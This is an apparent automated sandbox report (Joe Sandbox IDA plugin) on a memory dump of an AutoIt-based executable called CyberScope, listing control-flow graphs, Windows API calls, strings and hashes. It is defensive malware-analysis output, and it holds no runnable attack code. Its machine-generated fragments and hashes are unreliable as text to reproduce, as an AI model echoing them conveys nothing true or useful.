1e8a15-1e8a19 112->129 160 1e86ba-1e86c3 call 19c98d 113->160 161 1ab1d2-1ab1de 113->161 135 1e8949-1e894f 116->135 117->135 127 1e8aed-1e8afd 119->127 128 1e8aea 119->128 120->62 163 1e877a-1e878c call 1ab5b6 120->163 144 1e8aff 127->144 145 1e8b02-1e8b06 127->145 128->127 146 1e8aa1-1e8aa3 129->146 135->62 174 1e869d-1e86ab call 198ec0 136->174 175 1e8692-1e869b call 19c98d 136->175 179 1e88de 139->179 180 1e88cf-1e88dc call 19c98d 139->180 141->62 182 1e87fc-1e8805 call 1ab5b6 141->182 183 1e8719-1e8724 call 198577 142->183 143->183 144->145 145->79 146->62 149->62 153->149 164 1e8a9d 154->164 165 1e8aa8-1e8ab3 call 19b4b1 154->165 171 1e8b1e-1e8b21 159->171 172 1e8b1b 159->172 160->64 161->62 196 1e878e-1e879d call 19c98d 163->196 197 1e879f 163->197 164->146 165->153 165->159 171->19 172->171 203 1e86ae-1e86b5 174->203 175->203 181 1e88e2-1e88e9 179->181 180->181 190 1e88eb-1e88f0 call 19396b 181->190 191 1e88f5 call 193907 181->191 208 1e8818 182->208 209 1e8807-1e8816 call 19c98d 182->209 183->62 190->62 207 1e88fa 191->207 205 1e87a3-1e87ae call 1b9334 196->205 197->205 203->62 205->12 215 1e87b4-1e87ba 205->215 207->62 214 1e881c-1e883f 208->214 209->214 217 1e884d-1e8850 214->217 218 1e8841-1e8848 214->218 215->62 219 1e8852-1e885b 217->219 220 1e8860-1e8863 217->220 218->217 219->220 221 1e8865-1e886e 220->221 222 1e8873-1e8876 220->222 221->222 222->62 223 1e887c-1e888a 222->223 223->62
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 4"$@"$P"$`*&$`"$d0b$d10m0$d1b$d1r0,2$d5m0$e#&$i$t"$t"$(&$(&$(&$(&$"$"
                                                                                    • API String ID: 0-1895005367
                                                                                    • Opcode ID: c40684527e028e578c8ca9d3f5c710d2c76b5e0d2e0f65037921aee4ec011252
                                                                                    • Instruction ID: 1f516376992c27e673bde71992d85cc1ab3a28ea26b3e9b2492ec992c08b861f
                                                                                    • Opcode Fuzzy Hash: c40684527e028e578c8ca9d3f5c710d2c76b5e0d2e0f65037921aee4ec011252
                                                                                    • Instruction Fuzzy Hash: 54625974508781DFC728DF15D094AAABBE0FF99308F10896EE4998B352DB71D949CF82
                                                                                    APIs
                                                                                    • GetInputState.USER32 ref: 0019EF07
                                                                                    • timeGetTime.WINMM ref: 0019F107
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0019F228
                                                                                    • TranslateMessage.USER32(?), ref: 0019F27B
                                                                                    • DispatchMessageW.USER32(?), ref: 0019F289
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0019F29F
                                                                                    • Sleep.KERNEL32(0000000A), ref: 0019F2B1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                    • String ID: (&
                                                                                    • API String ID: 2189390790-1801568203
                                                                                    • Opcode ID: d3fea412863a0c8be83eba85d07e7d3f086fae2094ebbc86a2618c667cdfb8fc
                                                                                    • Instruction ID: eb825b83cc7ae71691f1e361a41e26f00aa7b57742831e3e860f969794c972ec
                                                                                    • Opcode Fuzzy Hash: d3fea412863a0c8be83eba85d07e7d3f086fae2094ebbc86a2618c667cdfb8fc
                                                                                    • Instruction Fuzzy Hash: E0320130604742EFDB28CF25C888BAAB7E5BF91304F18852DF565C7291C771E999CB92

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 589 19370f-193724 590 193784-193786 589->590 591 193726-193729 589->591 590->591 592 193788 590->592 593 19372b-193732 591->593 594 19378a 591->594 595 19376f-193777 DefWindowProcW 592->595 598 193738-19373d 593->598 599 193804-19380c PostQuitMessage 593->599 596 1d3df4-1d3e1c call 192f92 call 1af23c 594->596 597 193790-193795 594->597 603 19377d-193783 595->603 632 1d3e21-1d3e28 596->632 605 1937bc-1937e3 SetTimer RegisterWindowMessageW 597->605 606 193797-19379a 597->606 600 193743-193747 598->600 601 1d3e61-1d3e75 call 1fc8f7 598->601 604 1937b8-1937ba 599->604 607 19374d-193752 600->607 608 19380e-193818 call 1afcad 600->608 601->604 624 1d3e7b 601->624 604->603 605->604 609 1937e5-1937f0 CreatePopupMenu 605->609 612 1d3d95-1d3d98 606->612 613 1937a0-1937b3 KillTimer call 193907 call 1959ff 606->613 614 193758-19375d 607->614 615 1d3e46-1d3e4d 607->615 626 19381d 608->626 609->604 619 1d3d9a-1d3d9e 612->619 620 1d3dd0-1d3def MoveWindow 612->620 613->604 622 193763-193769 614->622 623 1937f2-193802 call 19381f 614->623 615->595 630 1d3e53-1d3e5c call 1f1423 615->630 627 1d3dbf-1d3dcb SetFocus 619->627 628 1d3da0-1d3da3 619->628 620->604 622->595 622->632 623->604 624->595 626->604 627->604 628->622 633 1d3da9-1d3dba call 192f92 628->633 630->595 632->595 638 1d3e2e-1d3e41 call 193907 call 19396b 632->638 633->604 638->595
                                                                                    APIs
                                                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00193709,?,?), ref: 00193777
                                                                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,00193709,?,?), ref: 001937A3
                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001937C6
                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00193709,?,?), ref: 001937D1
                                                                                    • CreatePopupMenu.USER32 ref: 001937E5
                                                                                    • PostQuitMessage.USER32(00000000), ref: 00193806
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                    • String ID: 0$&$0$&$TaskbarCreated
                                                                                    • API String ID: 129472671-1751827816
                                                                                    • Opcode ID: e3990438fd59388e3ee1109f2dc5b0a7f7592a3a6a090c2e39f1558a0cbd7331
                                                                                    • Instruction ID: d99a8ea0203c778f7661a5203db11d3ceeebe532313f2bf2169e304116625fe1
                                                                                    • Opcode Fuzzy Hash: e3990438fd59388e3ee1109f2dc5b0a7f7592a3a6a090c2e39f1558a0cbd7331
                                                                                    • Instruction Fuzzy Hash: D04116F5210644FBDF2C2BFCEC4DBB93A65E754304F104225F622862A0CBB89F599762

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00193657
                                                                                    • RegisterClassExW.USER32(00000030), ref: 00193681
                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00193692
                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 001936AF
                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001936BF
                                                                                    • LoadIconW.USER32(000000A9), ref: 001936D5
                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001936E4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                    • API String ID: 2914291525-1005189915
                                                                                    • Opcode ID: 248f3483c063ca910f863268f5aae186d5435dfac9dd6002cd8490f3a6c5b140
                                                                                    • Instruction ID: 4398ba32d4b5c092488af20b2d534483c7e95815ff2421cf49ce028db3f33ad3
                                                                                    • Opcode Fuzzy Hash: 248f3483c063ca910f863268f5aae186d5435dfac9dd6002cd8490f3a6c5b140
                                                                                    • Instruction Fuzzy Hash: 2021EFB1D12218EFDB109FE4F88DB9DBBB4FB08710F10911AE611A62A0D7B946498F90

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 646 1d09db-1d0a0b call 1d07af 649 1d0a0d-1d0a18 call 1bf636 646->649 650 1d0a26-1d0a32 call 1c5594 646->650 657 1d0a1a-1d0a21 call 1bf649 649->657 655 1d0a4b-1d0a94 call 1d071a 650->655 656 1d0a34-1d0a49 call 1bf636 call 1bf649 650->656 665 1d0a96-1d0a9f 655->665 666 1d0b01-1d0b0a GetFileType 655->666 656->657 667 1d0cfd-1d0d03 657->667 671 1d0ad6-1d0afc GetLastError call 1bf613 665->671 672 1d0aa1-1d0aa5 665->672 668 1d0b0c-1d0b3d GetLastError call 1bf613 CloseHandle 666->668 669 1d0b53-1d0b56 666->669 668->657 683 1d0b43-1d0b4e call 1bf649 668->683 674 1d0b5f-1d0b65 669->674 675 1d0b58-1d0b5d 669->675 671->657 672->671 676 1d0aa7-1d0ad4 call 1d071a 672->676 679 1d0b69-1d0bb7 call 1c54dd 674->679 680 1d0b67 674->680 675->679 676->666 676->671 689 1d0bb9-1d0bc5 call 1d092b 679->689 690 1d0bc7-1d0beb call 1d04cd 679->690 680->679 683->657 689->690 695 1d0bef-1d0bf9 call 1c8a2e 689->695 696 1d0bed 690->696 697 1d0bfe-1d0c41 690->697 695->667 696->695 699 1d0c43-1d0c47 697->699 700 1d0c62-1d0c70 697->700 699->700 702 1d0c49-1d0c5d 699->702 703 1d0cfb 700->703 704 1d0c76-1d0c7a 700->704 702->700 703->667 704->703 705 1d0c7c-1d0caf CloseHandle call 1d071a 704->705 708 1d0cb1-1d0cdd GetLastError call 1bf613 call 1c56a6 705->708 709 1d0ce3-1d0cf7 705->709 708->709 709->703
                                                                                    APIs
                                                                                      • Part of subcall function 001D071A: CreateFileW.KERNELBASE(00000000,00000000,?,001D0A84,?,?,00000000,?,001D0A84,00000000,0000000C), ref: 001D0737
                                                                                    • GetLastError.KERNEL32 ref: 001D0AEF
                                                                                    • __dosmaperr.LIBCMT ref: 001D0AF6
                                                                                    • GetFileType.KERNELBASE(00000000), ref: 001D0B02
                                                                                    • GetLastError.KERNEL32 ref: 001D0B0C
                                                                                    • __dosmaperr.LIBCMT ref: 001D0B15
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 001D0B35
                                                                                    • CloseHandle.KERNEL32(?), ref: 001D0C7F
                                                                                    • GetLastError.KERNEL32 ref: 001D0CB1
                                                                                    • __dosmaperr.LIBCMT ref: 001D0CB8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                    • String ID: H
                                                                                    • API String ID: 4237864984-2852464175
                                                                                    • Opcode ID: 81a663e4d90f27528e96f2f193f613e2dd24fe75e3266759c5a647f37a64d3de
                                                                                    • Instruction ID: 54195e2d170346913063e8ce30d8325c2cff7c64733d0c70f86ca47e488f31c7
                                                                                    • Opcode Fuzzy Hash: 81a663e4d90f27528e96f2f193f613e2dd24fe75e3266759c5a647f37a64d3de
                                                                                    • Instruction Fuzzy Hash: F3A12632A142049FDF1AEF68DC96BAD3BA1AB1A324F14015EF815DF391D7319D12CB92

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 00195594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,001D4B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 001955B2
                                                                                      • Part of subcall function 00195238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0019525A
                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 001953C4
                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 001D4BFD
                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001D4C3E
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 001D4C80
                                                                                    • _wcslen.LIBCMT ref: 001D4CE7
                                                                                    • _wcslen.LIBCMT ref: 001D4CF6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                    • API String ID: 98802146-2727554177
                                                                                    • Opcode ID: 786aee10397becbf05ed61e6e43779b077d6a808031d086ebbf01cea0279d7d9
                                                                                    • Instruction ID: a1f6eeb761dc6d55d059c60a5193df4ecf7c38ae972a866c23311c0836c8ca94
                                                                                    • Opcode Fuzzy Hash: 786aee10397becbf05ed61e6e43779b077d6a808031d086ebbf01cea0279d7d9
                                                                                    • Instruction Fuzzy Hash: A6718E71515301AFC714EF65E8859ABBBE8FF68340F80842EF441D72B0DBB19A59CB91

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 001934DE
                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 001934ED
                                                                                    • LoadIconW.USER32(00000063), ref: 00193503
                                                                                    • LoadIconW.USER32(000000A4), ref: 00193515
                                                                                    • LoadIconW.USER32(000000A2), ref: 00193527
                                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0019353F
                                                                                    • RegisterClassExW.USER32(?), ref: 00193590
                                                                                      • Part of subcall function 00193624: GetSysColorBrush.USER32(0000000F), ref: 00193657
                                                                                      • Part of subcall function 00193624: RegisterClassExW.USER32(00000030), ref: 00193681
                                                                                      • Part of subcall function 00193624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00193692
                                                                                      • Part of subcall function 00193624: InitCommonControlsEx.COMCTL32(?), ref: 001936AF
                                                                                      • Part of subcall function 00193624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001936BF
                                                                                      • Part of subcall function 00193624: LoadIconW.USER32(000000A9), ref: 001936D5
                                                                                      • Part of subcall function 00193624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001936E4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                    • String ID: #$0$AutoIt v3
                                                                                    • API String ID: 423443420-4155596026
                                                                                    • Opcode ID: 732871d5d38a02da94cd7162f5426f5c5cd778805ce9bea58ef7d7d40eabeab3
                                                                                    • Instruction ID: 43ae1763afc776bbd3bfa42be60434cc48398db50e031e859ad6aa7ea9d4b6de
                                                                                    • Opcode Fuzzy Hash: 732871d5d38a02da94cd7162f5426f5c5cd778805ce9bea58ef7d7d40eabeab3
                                                                                    • Instruction Fuzzy Hash: C221FA71D10714EBDB109FA5FC5DA99BFB8EB08750F00805AE604A63A0D7F945698F90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Variable must be of type 'Object'.$t5&$t5&$t5&$t5&$t5&t5&
                                                                                    • API String ID: 0-741992382
                                                                                    • Opcode ID: 75eecbe7f509f93157db5e5d16958939d13fd86a7adb265b404f39d01b405a2d
                                                                                    • Instruction ID: 3b966eb47297358588af3f933273edcf7868d8645bb8e38ba6ae7d86c175905f
                                                                                    • Opcode Fuzzy Hash: 75eecbe7f509f93157db5e5d16958939d13fd86a7adb265b404f39d01b405a2d
                                                                                    • Instruction Fuzzy Hash: C6C26975E00605EFCF24CF98C884BAEB7B1BF19314F258169E906AB391D775AD42CB90

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1298 192ab0-192ae9 1299 192aef-192b05 mciSendStringW 1298->1299 1300 1d3a1a-1d3a1b DestroyWindow 1298->1300 1301 192b0b-192b13 1299->1301 1302 192d66-192d73 1299->1302 1304 1d3a26-1d3a33 1300->1304 1303 192b19-192b28 call 192ede 1301->1303 1301->1304 1305 192d98-192d9f 1302->1305 1306 192d75-192d90 UnregisterHotKey 1302->1306 1319 192b2e-192b36 1303->1319 1320 1d3a70-1d3a7c 1303->1320 1307 1d3a35-1d3a38 1304->1307 1308 1d3a62-1d3a69 1304->1308 1305->1301 1311 192da5 1305->1311 1306->1305 1310 192d92-192d93 call 192770 1306->1310 1312 1d3a3a-1d3a42 call 197aab 1307->1312 1313 1d3a44-1d3a47 FindClose 1307->1313 1308->1304 1316 1d3a6b 1308->1316 1310->1305 1311->1302 1318 1d3a4d-1d3a5a 1312->1318 1313->1318 1316->1320 1318->1308 1322 1d3a5c-1d3a5d call 203cf6 1318->1322 1323 192b3c-192b61 call 19e6a0 1319->1323 1324 1d3a94-1d3aa1 1319->1324 1325 1d3a7e-1d3a80 FreeLibrary 1320->1325 1326 1d3a86-1d3a8d 1320->1326 1322->1308 1336 192b98-192ba3 CoUninitialize 1323->1336 1337 192b63 1323->1337 1327 1d3ac8-1d3acf 1324->1327 1328 1d3aa3-1d3ac0 VirtualFree 1324->1328 1325->1326 1326->1320 1331 1d3a8f 1326->1331 1327->1324 1333 1d3ad1 1327->1333 1328->1327 1332 1d3ac2-1d3ac3 call 203d5c 1328->1332 1331->1324 1332->1327 1339 1d3ad6-1d3ada 1333->1339 1338 192ba9-192bae 1336->1338 1336->1339 1340 192b66-192b96 call 1930c0 call 193069 1337->1340 1341 1d3aeb-1d3af8 call 203d30 1338->1341 1342 192bb4-192bbe 1338->1342 1339->1338 1343 1d3ae0-1d3ae4 call 200b4c 1339->1343 1340->1336 1356 1d3afa 1341->1356 1345 192bc4-192c45 call 19bd98 call 192ff4 call 192e85 call 1b0184 call 192e1c call 19bd98 call 19e6a0 call 192eae call 1b0184 1342->1345 1346 192da7-192db4 call 1afb19 1342->1346 1351 1d3ae6 1343->1351 1360 1d3aff-1d3b21 call 1b013d 1345->1360 1387 192c4b-192c6f call 1b0184 1345->1387 1346->1345 1359 192dba 1346->1359 1351->1338 1356->1360 1359->1346 1366 1d3b23 1360->1366 1369 1d3b28-1d3b4a call 1b013d 1366->1369 1375 1d3b4c 1369->1375 1379 1d3b51-1d3b73 call 1b013d 1375->1379 1385 1d3b75 1379->1385 1388 1d3b7a-1d3b87 call 1f6e3b 1385->1388 1387->1369 1394 192c75-192c99 call 1b0184 1387->1394 1393 1d3b89 1388->1393 1396 1d3b8e-1d3b9b call 1abdf0 1393->1396 1394->1379 1399 192c9f-192cb9 call 1b0184 1394->1399 1402 1d3b9d 1396->1402 1399->1388 1404 192cbf-192ce3 call 192e85 call 1b0184 1399->1404 1405 1d3ba2-1d3baf call 203c8a 1402->1405 1404->1396 1413 192ce9-192cf1 1404->1413 1412 1d3bb1 1405->1412 1415 1d3bb6-1d3bc3 call 203d11 1412->1415 1413->1405 1414 192cf7-192d15 call 19bd98 call 192fba 1413->1414 1414->1415 1424 192d1b-192d29 1414->1424 1420 1d3bc5 1415->1420 1423 1d3bca-1d3bd7 call 203d11 1420->1423 1429 1d3bd9 1423->1429 1424->1423 1426 192d2f-192d65 call 19bd98 * 3 call 192f26 1424->1426 1429->1429
                                                                                    APIs
                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00192AF9
                                                                                    • CoUninitialize.COMBASE ref: 00192B98
                                                                                    • UnregisterHotKey.USER32(?), ref: 00192D7D
                                                                                    • DestroyWindow.USER32(?), ref: 001D3A1B
                                                                                    • FreeLibrary.KERNEL32(?), ref: 001D3A80
                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 001D3AAD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                    • String ID: close all
                                                                                    • API String ID: 469580280-3243417748
                                                                                    • Opcode ID: 62710d1febaf3bacdb6187b484ca3d260c6ea22edfe497962ecad9688c787923
                                                                                    • Instruction ID: 2480a0a7aecddb6872de4c6f5f438c36ba632a91567f9cad03f60de38d96ccfb
                                                                                    • Opcode Fuzzy Hash: 62710d1febaf3bacdb6187b484ca3d260c6ea22edfe497962ecad9688c787923
                                                                                    • Instruction Fuzzy Hash: DBD16D31701212EFCB29EF54D899A69F7A4BF14710F1542AEE45AAB352CB30EE52CF41

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 0019327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 001932AF
                                                                                      • Part of subcall function 0019327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 001932B7
                                                                                      • Part of subcall function 0019327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 001932C2
                                                                                      • Part of subcall function 0019327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 001932CD
                                                                                      • Part of subcall function 0019327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 001932D5
                                                                                      • Part of subcall function 0019327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 001932DD
                                                                                      • Part of subcall function 00193205: RegisterWindowMessageW.USER32(00000004,?,00192964), ref: 0019325D
                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00192A0A
                                                                                    • OleInitialize.OLE32 ref: 00192A28
                                                                                    • CloseHandle.KERNELBASE(00000000,00000000), ref: 001D3A0D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                    • String ID: (&&$0$&$4'&$d(&$$&
                                                                                    • API String ID: 1986988660-2635071999
                                                                                    • Opcode ID: 22a72dcd1078a742d25a020d57b916bc087b66cfe78d3d929e13ad42fb70e94f
